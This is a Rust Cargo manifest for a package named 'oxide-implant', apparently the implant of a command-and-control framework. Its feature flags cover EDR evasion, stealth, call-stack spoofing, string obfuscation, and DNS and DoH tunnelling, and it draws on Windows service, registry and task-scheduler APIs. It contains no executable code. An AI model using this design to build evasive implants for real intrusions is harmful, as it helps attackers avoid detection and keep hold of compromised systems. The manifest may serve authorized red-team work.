[package]
name = "oxide-implant"
version = "0.1.0"
edition = "2021"

[features]
default = ["tls-transport"]
tls-transport = []
http-transport = ["dep:tokio-tungstenite", "dep:futures-util"]
edr-evasion = ["dep:dinvk"]
uwd = ["dep:uwd"]
stealth = ["dep:windows", "dep:windows-core"]
dns-transport = ["data-encoding", "rand_distr", "flate2"]
doh-transport = ["data-encoding", "rand_distr", "flate2"]

[dependencies]
oxide-shared = { path = "../shared" }
tokio = { version = "1", features = ["full"] }
tokio-rustls = "0.26"
rustls = "0.23"
rustls-pemfile = "2"
serde_json = "1"
uuid = { version = "1", features = ["v4"] }
sha2 = "0.10"
hex = "0.4"
sysinfo = "0.32"
rand = "0.8"
obfstr = "0.4"
base64 = "0.22"
anyhow = "1"
reqwest = { version = "0.12", features = ["blocking", "rustls-tls"] }
tokio-tungstenite = { version = "0.23", features = ["rustls-tls-webpki-roots"], optional = true }
futures-util = { version = "0.3", optional = true }
data-encoding = { version = "2", optional = true }
rand_distr = { version = "0.4", optional = true }
flate2 = { version = "1", optional = true }

[target.'cfg(unix)'.dependencies]
nix = { version = "0.29", features = ["user", "process"] }

[target.'cfg(target_os = "windows")'.dependencies]
winreg = "0.52"
windows-sys = { version = "0.52", features = [
    "Win32_Foundation",
    "Win32_Security",
    "Win32_Storage_FileSystem",
    "Win32_System_IO",
    "Win32_System_Pipes",
    "Win32_System_Services",
    "Win32_System_Threading",
] }
dinvk = { version = "0.4", optional = true }
uwd = { version = "0.3", optional = true }
windows = { version = "0.57", features = [
    "Win32_Foundation",
    "Win32_System_Com",
    "Win32_System_TaskScheduler",
    "Win32_System_Threading",
    "Win32_Storage_FileSystem",
], optional = true }
windows-core = { version = "0.57", optional = true }
